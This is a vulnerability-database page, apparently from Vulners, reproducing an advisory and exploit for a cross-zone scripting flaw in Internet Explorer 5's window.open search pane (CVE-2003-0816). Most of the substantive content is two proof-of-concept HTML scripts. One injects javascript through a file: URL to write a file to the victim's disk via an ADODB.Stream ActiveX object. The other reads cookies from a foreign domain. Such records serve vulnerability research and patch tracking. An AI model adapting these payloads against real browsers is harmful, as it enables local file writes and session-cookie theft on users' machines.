Microsoft Internet Explorer 5 - window.open Search Pane Cross-Zone Scripting
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2003-0816 | 14 Jan 200405:00 | – | cve | |
| CVE-2003-0816 | 14 Jan 200405:00 | – | cvelist | |
| Microsoft Internet Explorer 6 - Script Execution | 10 Sep 200300:00 | – | exploitdb | |
| CVE-2003-0816 | 3 Feb 200405:00 | – | nvd | |
| IE 5.01 5.5 6.0 Cumulative patch (890923) | 3 Nov 200500:00 | – | openvas | |
| Microsoft Internet Explorer 5.01, 5.5, 6.0 Cumulative Patch (890923, MS05-020) | 3 Nov 200500:00 | – | openvas | |
| Microsoft Security Bulletin MS03-048 | 12 Nov 200300:00 | – | securityvulns | |
| Microsoft Internet Explorer does not adequately validate javascript: protocol URL | 19 Nov 200300:00 | – | cert | |
| Microsoft Internet Explorer does not properly validate URL sources | 18 Nov 200300:00 | – | cert |
source: https://www.securityfocus.com/bid/9798/info
A vulnerability has been reported in Microsoft Internet Explorer that could enable unauthorized access by malicious scripts and Active Content to document properties across different Security Zones and foreign domains. This issue is exposed when search panes are opened via the window.open method. It is possible for malicious script code to access the properties of a foreign domain opened within the search pane.
---------------------------CrossZone.htm---------------------------
<script>
window.open("http://wrong_site_add/","_search") //To load "Friendly HTTP error messages" page
// cause it's in My Computer Zone.
setTimeout(function(){
// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
+ ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
inject_html="<img src='" + img_src + "'>";
window.open('file:javascript:document.write("' + inject_html + '")','_search');
},5000);
</script>
-------------------------------End---------------------------------
---------------------------CrossSite.htm---------------------------
<script>
window.open("http://www.google.com/","_search")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_search")
},5000);
</script>
-------------------------------End---------------------------------Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Dec 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.48374